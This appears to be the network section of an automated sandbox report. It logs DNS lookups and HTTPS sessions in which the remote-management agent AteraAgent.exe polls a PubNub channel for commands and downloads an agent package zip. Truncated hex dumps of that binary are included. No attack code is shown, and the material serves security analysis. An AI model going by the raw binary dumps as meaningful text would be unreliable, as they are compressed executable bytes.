                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.898215055 CET192.168.2.71.1.1.10x2068Standard query (0)agent-api.atera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:17.856092930 CET192.168.2.71.1.1.10xa1ceStandard query (0)agent-api.atera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:20.404082060 CET192.168.2.71.1.1.10xc80bStandard query (0)agent-api.atera.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:15.471230030 CET1.1.1.1192.168.2.70xfeaeNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:17.050045013 CET1.1.1.1192.168.2.70x32f3No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:17.050045013 CET1.1.1.1192.168.2.70x32f3No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:26.137881994 CET1.1.1.1192.168.2.70x1b95No error (0)agent-api.atera.comagentsapi.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:33.294840097 CET1.1.1.1192.168.2.70x5834No error (0)windowsupdatebg.s.llnwi.net178.79.238.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:33.294840097 CET1.1.1.1192.168.2.70x5834No error (0)windowsupdatebg.s.llnwi.net178.79.238.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:34.910383940 CET1.1.1.1192.168.2.70xca8cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:34.910383940 CET1.1.1.1192.168.2.70xca8cNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:36.508972883 CET1.1.1.1192.168.2.70xda34No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:36.508972883 CET1.1.1.1192.168.2.70xda34No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:36.556001902 CET1.1.1.1192.168.2.70xf9e6No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:36.556001902 CET1.1.1.1192.168.2.70xf9e6No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:38.106789112 CET1.1.1.1192.168.2.70xb807No error (0)agent-api.atera.comagentsapi.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:41.430591106 CET1.1.1.1192.168.2.70x59b2No error (0)ps.pndsn.com13.232.67.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:41.430591106 CET1.1.1.1192.168.2.70x59b2No error (0)ps.pndsn.com13.232.67.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:41.463342905 CET1.1.1.1192.168.2.70x9ac1No error (0)agent-api.atera.comagentsapi.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:48.497072935 CET1.1.1.1192.168.2.70xb8b8No error (0)ps.atera.comd25btwd9wax8gu.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:48.497072935 CET1.1.1.1192.168.2.70xb8b8No error (0)d25btwd9wax8gu.cloudfront.net108.158.75.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:48.497072935 CET1.1.1.1192.168.2.70xb8b8No error (0)d25btwd9wax8gu.cloudfront.net108.158.75.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:48.497072935 CET1.1.1.1192.168.2.70xb8b8No error (0)d25btwd9wax8gu.cloudfront.net108.158.75.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:48.497072935 CET1.1.1.1192.168.2.70xb8b8No error (0)d25btwd9wax8gu.cloudfront.net108.158.75.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:52.606940985 CET1.1.1.1192.168.2.70xc150No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:52.606940985 CET1.1.1.1192.168.2.70xc150No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:52.991472006 CET1.1.1.1192.168.2.70xa7d8No error (0)agent-api.atera.comagentsapi.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:36.923233032 CET1.1.1.1192.168.2.70x1db4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:36.923233032 CET1.1.1.1192.168.2.70x1db4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:41.086157084 CET1.1.1.1192.168.2.70x3881No error (0)agent-api.atera.comagentsapi.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:49.100241899 CET1.1.1.1192.168.2.70x4871No error (0)agent-api.atera.comagentsapi.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:58.529512882 CET1.1.1.1192.168.2.70x3c20No error (0)agent-api.atera.comagentsapi.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.203849077 CET1.1.1.1192.168.2.70x2068No error (0)agent-api.atera.comagentsapi.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:17.995516062 CET1.1.1.1192.168.2.70xa1ceNo error (0)agent-api.atera.comagentsapi.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:18.018788099 CET1.1.1.1192.168.2.70xa138No error (0)windowsupdatebg.s.llnwi.net178.79.238.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:18.018788099 CET1.1.1.1192.168.2.70xa138No error (0)windowsupdatebg.s.llnwi.net178.79.238.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:20.541502953 CET1.1.1.1192.168.2.70xc80bNo error (0)agent-api.atera.comagentsapi.trafficmanager.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                          • ps.pndsn.com
                                                                                                                                                                                                                                                                          • ps.atera.com

                                                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          0192.168.2.74976813.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:15:43 UTC183OUTGET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b619f5c8-c13b-4e86-88e3-ba75e0e2aa5f&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          2024-11-24 10:15:44 UTC242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:15:44 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:15:44 UTC19INData Raw: 5b 31 37 33 32 34 34 33 33 34 34 31 30 31 30 34 39 36 5d
                                                                                                                                                                                                                                                                          Data Ascii: [17324433441010496]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          1192.168.2.74977113.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:15:43 UTC364OUTGET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=b225017a-a518-407e-ba60-89916d0db242&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          2024-11-24 10:15:44 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:15:44 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 45
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:15:44 UTC45INData Raw: 7b 22 74 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 33 34 34 30 39 34 32 34 31 38 22 2c 22 72 22 3a 33 31 7d 2c 22 6d 22 3a 5b 5d 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"t":{"t":"17324433440942418","r":31},"m":[]}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          2192.168.2.74977913.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:15:46 UTC159OUTGET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=bf4acf61-3ccb-481c-8428-f2b8078e60c9&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:15:47 UTC242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:15:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:15:47 UTC19INData Raw: 5b 31 37 33 32 34 34 33 33 34 37 32 33 36 33 35 39 38 5d
                                                                                                                                                                                                                                                                          Data Ascii: [17324433472363598]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          3192.168.2.74978013.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:15:46 UTC362OUTGET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=ec94d306-e989-460d-a2a2-e676241f4153&tr=31&tt=17324433440942418&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:15:47 UTC279INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:15:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 1854
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:15:47 UTC1854INData Raw: 7b 22 74 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 33 34 37 34 30 31 38 35 34 32 22 2c 22 72 22 3a 33 31 7d 2c 22 6d 22 3a 5b 7b 22 61 22 3a 22 32 22 2c 22 66 22 3a 30 2c 22 69 22 3a 22 66 31 63 37 62 34 30 35 2d 63 64 61 38 2d 34 64 38 37 2d 61 30 66 62 2d 39 38 62 61 63 61 37 66 63 65 34 64 22 2c 22 70 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 33 34 37 34 30 31 38 35 34 32 22 2c 22 72 22 3a 34 32 7d 2c 22 6b 22 3a 22 73 75 62 2d 63 2d 61 30 32 63 65 63 61 38 2d 61 39 35 38 2d 31 31 65 35 2d 62 64 38 63 2d 30 36 31 39 66 38 39 34 35 61 34 66 22 2c 22 63 22 3a 22 32 30 39 34 66 34 39 37 2d 32 65 39 34 2d 34 32 66 30 2d 62 32 37 63 2d 61 64 64 37 65 33 37 37 61 39 64 32 22 2c 22 64 22 3a 7b 22 43 6f 6d 6d 61 6e 64 49 64 22 3a 22 36 62 65 37 34 35 30
                                                                                                                                                                                                                                                                          Data Ascii: {"t":{"t":"17324433474018542","r":31},"m":[{"a":"2","f":0,"i":"f1c7b405-cda8-4d87-a0fb-98baca7fce4d","p":{"t":"17324433474018542","r":42},"k":"sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f","c":"2094f497-2e94-42f0-b27c-add7e377a9d2","d":{"CommandId":"6be7450


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          4192.168.2.74979413.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:15:50 UTC362OUTGET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=97a3c5c1-3b53-4697-9042-014f3710a368&tr=31&tt=17324433474018542&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:16:43 UTC279INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:16:43 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 1854
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:16:43 UTC1854INData Raw: 7b 22 74 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 30 33 35 34 30 30 38 31 34 22 2c 22 72 22 3a 33 31 7d 2c 22 6d 22 3a 5b 7b 22 61 22 3a 22 32 22 2c 22 66 22 3a 30 2c 22 69 22 3a 22 62 33 62 37 33 37 31 30 2d 38 38 39 63 2d 34 34 36 37 2d 62 32 36 34 2d 37 61 31 64 30 66 65 66 38 66 37 32 22 2c 22 70 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 30 33 35 34 30 30 38 31 34 22 2c 22 72 22 3a 34 33 7d 2c 22 6b 22 3a 22 73 75 62 2d 63 2d 61 30 32 63 65 63 61 38 2d 61 39 35 38 2d 31 31 65 35 2d 62 64 38 63 2d 30 36 31 39 66 38 39 34 35 61 34 66 22 2c 22 63 22 3a 22 32 30 39 34 66 34 39 37 2d 32 65 39 34 2d 34 32 66 30 2d 62 32 37 63 2d 61 64 64 37 65 33 37 37 61 39 64 32 22 2c 22 64 22 3a 7b 22 43 6f 6d 6d 61 6e 64 49 64 22 3a 22 37 36 65 32 30 38 35
                                                                                                                                                                                                                                                                          Data Ascii: {"t":{"t":"17324434035400814","r":31},"m":[{"a":"2","f":0,"i":"b3b73710-889c-4467-b264-7a1d0fef8f72","p":{"t":"17324434035400814","r":43},"k":"sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f","c":"2094f497-2e94-42f0-b27c-add7e377a9d2","d":{"CommandId":"76e2085


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          5192.168.2.74979313.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:15:50 UTC159OUTGET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=ad2d8efb-91cb-408c-a084-3f507796640e&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:15:50 UTC242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:15:50 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:15:50 UTC19INData Raw: 5b 31 37 33 32 34 34 33 33 35 30 36 32 38 35 39 31 39 5d
                                                                                                                                                                                                                                                                          Data Ascii: [17324433506285919]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          6192.168.2.749796108.158.75.934436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:15:50 UTC212OUTGET /agentpackagesnet45/AgentPackageAgentInformation/38.0/AgentPackageAgentInformation.zip?7eC/6UeVMT2yOja7rugNNkxRTCpJ1tREDX7f6JkZ3OlpG2NJMgnOjIB/dqEJPBcv HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.atera.com
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          2024-11-24 10:15:51 UTC671INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 384542
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-MD5: SgmofSAE2sSwBofpyfFQNg==
                                                                                                                                                                                                                                                                          Last-Modified: Tue, 12 Nov 2024 07:13:54 GMT
                                                                                                                                                                                                                                                                          ETag: 0x8DD02E9910FA268
                                                                                                                                                                                                                                                                          Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                          x-ms-request-id: 4f2b2192-601e-007b-57cf-3c3f56000000
                                                                                                                                                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                          Date: Sat, 23 Nov 2024 11:11:18 GMT
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                          Via: 1.1 d13599e93e28769e714d7ed56fe9074a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: BAH53-P2
                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: E-LmB9aEb8N0HsFp5Sm718YgIPnWRIonEKVRrtS15JPQbIXTMEsqAg==
                                                                                                                                                                                                                                                                          Age: 83071
                                                                                                                                                                                                                                                                          2024-11-24 10:15:51 UTC15713INData Raw: 50 4b 03 04 2d 00 09 08 08 00 b9 39 6c 59 b5 ba a1 7d ff ff ff ff ff ff ff ff 3d 00 14 00 41 67 65 6e 74 50 61 63 6b 61 67 65 41 67 65 6e 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 2f 41 67 65 6e 74 50 61 63 6b 61 67 65 41 67 65 6e 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 65 78 65 01 00 10 00 28 b6 02 00 00 00 00 00 df 1b 01 00 00 00 00 00 e3 12 a7 01 2c f1 1b de 31 c7 8a 39 3e 6b 73 27 36 d0 73 2b 61 ce ce e3 d2 b6 cb 71 21 62 f9 4e 18 e5 1e a6 ed c3 a5 43 de 14 0c f6 81 ff 20 24 ff d5 3a 2d 75 b6 26 8e d9 8b a4 ae e1 2e bd 40 7e 84 03 06 21 73 f7 1f ae 94 a0 7d ab a6 99 3b a0 b8 5f e3 30 9a 41 f2 ec e6 d0 a8 20 53 e8 c2 17 fd 08 50 b9 08 97 28 2f f1 4c 63 d3 c6 76 04 21 b5 c3 d7 bb be b4 9c 43 48 ed cb 7f 13 28 f5 12 6a cb 1b 54 89 c5 9d 34 6d 19 74 79 dc 8f 06
                                                                                                                                                                                                                                                                          Data Ascii: PK-9lY}=AgentPackageAgentInformation/AgentPackageAgentInformation.exe(,19>ks'6s+aq!bNC $:-u&.@~!s};_0A SP(/Lcv!CH(jT4mty
                                                                                                                                                                                                                                                                          2024-11-24 10:15:51 UTC16384INData Raw: 0c cc bd 59 a8 e2 7f f2 62 5b 05 a8 cf b7 7d ad c3 72 23 c6 66 69 f0 13 18 61 36 de 2e 03 f9 23 e0 33 74 b9 36 83 32 e4 b8 e7 e8 68 01 3e 67 11 05 51 af 2d 54 88 ba c2 b9 3c 69 17 81 ac 93 76 c5 d1 90 d6 26 62 33 61 f2 e3 02 29 9b 7c 60 f6 a9 8b ba 43 a3 b6 63 4e 23 65 6d 67 55 cb 2a f7 0a 97 49 40 5b 66 7e 13 3d ca 1d 99 14 88 c2 1c 1e 74 8c 25 aa 61 32 3a f5 99 ec 55 96 47 43 e4 a9 e5 62 39 fe 2f 49 04 32 92 cb a7 c7 7b d8 21 11 5a 8a c1 d2 e6 af c8 ff 51 fd 76 29 d8 6a 46 92 7f 63 97 fa c1 bb 56 1e b6 2f 4f c9 db 62 e6 c6 f5 1c da ac 9e 92 c2 95 45 e1 2a a8 cd fb 4c 5f bc 5e 4d b6 58 3b 13 ab 6a e0 f8 e8 da 32 48 aa 58 1a 2c 88 59 29 b2 ba c0 79 89 fd c3 26 ba e4 70 4e 4d 33 10 51 55 16 e1 e2 97 c5 32 58 75 d3 0e d3 8e 1a 7b f0 3c 7f 54 65 f0 f5 78 e0
                                                                                                                                                                                                                                                                          Data Ascii: Yb[}r#fia6.#3t62h>gQ-T<iv&b3a)|`CcN#emgU*I@[f~=t%a2:UGCb9/I2{!ZQv)jFcV/ObE*L_^MX;j2HX,Y)y&pNM3QU2Xu{<Tex
                                                                                                                                                                                                                                                                          2024-11-24 10:15:51 UTC16384INData Raw: 6d 41 6b 15 dd 35 67 f7 42 05 aa af 12 db f2 c4 08 3e 46 cf b6 64 90 7f 66 f3 76 74 97 4b 38 0b 60 60 59 5a 5d f5 03 01 5f 6e f7 80 62 2e 1a 10 f9 a4 93 83 0d b1 b0 dd bb fb fc 84 54 f3 20 79 b3 f5 57 a0 09 68 9e fa 6d 6e f7 37 1b 55 8d b0 c0 ae 7f 89 8e 39 b7 eb ee 6c b9 d8 55 69 0f 06 8a 70 71 7c 2b 81 36 ce 25 fa e8 6a be 9b 9a 40 fe b9 ee 4e 2f ab 3c d5 3a 27 5e 49 66 ce 2a b7 57 f7 aa b1 dd 4c c2 0f 6e a9 3e 5e 05 bd f2 2d 03 15 60 4d ce d7 36 78 a6 41 14 cd 17 45 22 e8 c5 a0 10 f8 1f 07 20 6b e5 5f 61 75 84 a2 aa 50 26 8d 2d 5f 1c aa c8 c7 6e 4b 49 cb cc 5d 0f fa 14 22 82 9f fb 3c 22 4b b9 4b c9 d7 96 fc ac 55 f0 cc c1 2a 68 d1 66 1f 83 8a 76 7a f3 d5 15 f4 59 9c 0b 37 18 b1 41 d2 b7 bc 44 46 8d 5a b3 bb 72 0d df 42 de 5d 7c 4e 91 1e 0c 73 70 ca a4
                                                                                                                                                                                                                                                                          Data Ascii: mAk5gB>FdfvtK8``YZ]_nb.T yWhmn7U9lUipq|+6%j@N/<:'^If*WLn>^-`M6xAE" k_auP&-_nKI]"<"KKU*hfvzY7ADFZrB]|Nsp
                                                                                                                                                                                                                                                                          2024-11-24 10:15:51 UTC16384INData Raw: 53 a7 b1 8b b4 14 78 de 25 1c 8d 99 f3 12 2a 79 07 f8 89 22 81 a4 ea 40 bd 6f fb fe 78 33 83 e9 99 45 f9 09 23 ce 93 b2 63 00 fa c5 4d 3e 21 e8 28 67 57 d4 81 2e ab 6e 0f 65 47 1c fe f2 18 6b 45 db 7e 8a 52 c1 b9 30 d2 e5 d0 7e 7f f6 9b fa 78 97 5e 24 c2 9b 6e 56 22 95 b2 aa d0 36 c0 d6 c2 ad 2e 86 3f 9d d3 ee 06 f0 71 74 2c ce ac 14 62 1b 0f 29 34 6b bb de 66 87 7a 44 25 76 9c f9 27 08 0e e5 bd 08 8d d1 7b 3f ef aa bb 0c 58 46 5c 94 55 84 c3 17 74 da 38 ee 80 32 93 e6 46 f9 6c 22 9d 49 bf 4d cc 0f 64 e1 ab 03 02 34 6e 0e df 95 57 32 53 dc 27 a1 e3 12 25 87 7a 4e f0 ac e2 d2 0d 00 dd ba 22 ac 74 de 93 9f f2 77 7a 9f 90 95 4d c8 c9 1d 91 3e 40 0a f9 ca 6d 4d 49 a9 10 ff ad 0e f0 ea ff 3d 6a 18 7f cb 0e 13 5a 13 51 67 d4 55 9c 58 ce 78 bf 0e a1 84 a0 0c e8
                                                                                                                                                                                                                                                                          Data Ascii: Sx%*y"@ox3E#cM>!(gW.neGkE~R0~x^$nV"6.?qt,b)4kfzD%v'{?XF\Ut82Fl"IMd4nW2S'%zN"twzM>@mMI=jZQgUXx
